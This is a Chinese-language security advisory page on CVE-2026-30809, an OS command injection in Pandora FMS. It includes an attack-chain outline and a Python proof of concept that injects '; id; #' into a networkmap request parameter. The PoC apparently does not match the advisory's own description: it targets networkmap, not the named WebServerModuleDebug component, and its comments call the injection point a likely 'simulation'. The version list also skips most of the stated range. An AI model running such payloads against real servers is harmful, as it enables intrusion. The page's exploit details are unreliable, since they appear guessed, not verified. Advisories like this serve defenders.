CVE-2026-30809 CVSS 8.8 高危

CVE-2026-30809 Pandora FMS 操作系统命令注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30809

漏洞类型

操作系统命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Pandora FMS

漏洞概述

Pandora FMS 在版本 777 至 800 中存在严重的操作系统命令注入漏洞。该漏洞源于 WebServerModuleDebug 组件未能正确中和特殊元素。攻击者仅需低权限且无需用户交互，即可通过网络发送特制请求，在目标服务器上执行任意操作系统命令，可能导致系统被完全控制及数据泄露。

技术细节

该漏洞的根本原因在于 Pandora FMS 的 WebServerModuleDebug 模块在处理用户输入时，缺乏对操作系统命令特殊字符（如 ;, |, & 等）的严格过滤与转义机制。应用程序直接将未经过滤的参数传递给系统 Shell 执行。攻击者可利用低权限账户，构造包含恶意 Shell 命令的 HTTP 请求发送至受影响接口。由于漏洞允许网络攻击且无需用户交互，攻击者能够成功注入并执行任意系统指令。这可能导致攻击者获取服务器权限、读取敏感文件、安装后门，甚至破坏系统完整性，对机密性、完整性和可用性造成严重影响。

攻击链分析

STEP 1

1. 侦察与发现

攻击者识别网络上运行 Pandora FMS 的目标服务器，并确认其版本在受影响范围内（777-800）。

STEP 2

2. 获取凭证

攻击者通过暴力破解或其他方式获取一个低权限的 Pandora FMS 账户凭证（满足 PR:L 要求）。

STEP 3

3. 构造攻击载荷

攻击者针对 WebServerModuleDebug 模块，构造包含操作系统命令注入字符（如分号或管道符）的恶意 HTTP POST 请求。

STEP 4

4. 发送恶意请求

攻击者通过网络向目标服务器发送构造好的请求，触发漏洞。

STEP 5

5. 执行命令与维持访问

服务器端解析请求并执行注入的恶意系统命令，攻击者进而建立 Shell 连接，控制服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/pandora_console/index.php"

# Payload to execute 'id' command
# The vulnerable parameter is likely part of the WebServerModuleDebug functionality
payload = {
    "sec2": "operation/agentes/networkmap",
    "operation": "networkmap",
    "id_networkmap": "1",
    "create_networkmap": "1",
    "networkmap_name": "test",
    "protocol": "; id; #",  # Injection point simulation
    "calculate_topology": "1"
}

# Low privilege credentials
auth = (
    "username",
    "password"
)

try:
    response = requests.post(url, data=payload, auth=auth)
    # Check if command output is present in response
    if "uid=" in response.text:
        print("[+] Exploit successful! Command execution detected.")
        print(response.text)
    else:
        print("[-] Exploit failed or output not found.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Pandora FMS 777

Pandora FMS 778

Pandora FMS 779

Pandora FMS 800

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 WebServerModuleDebug 相关模块，或通过网络访问控制列表 (ACL) 严格限制对 Pandora FMS 控制台的访问，仅允许可信 IP 地址连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表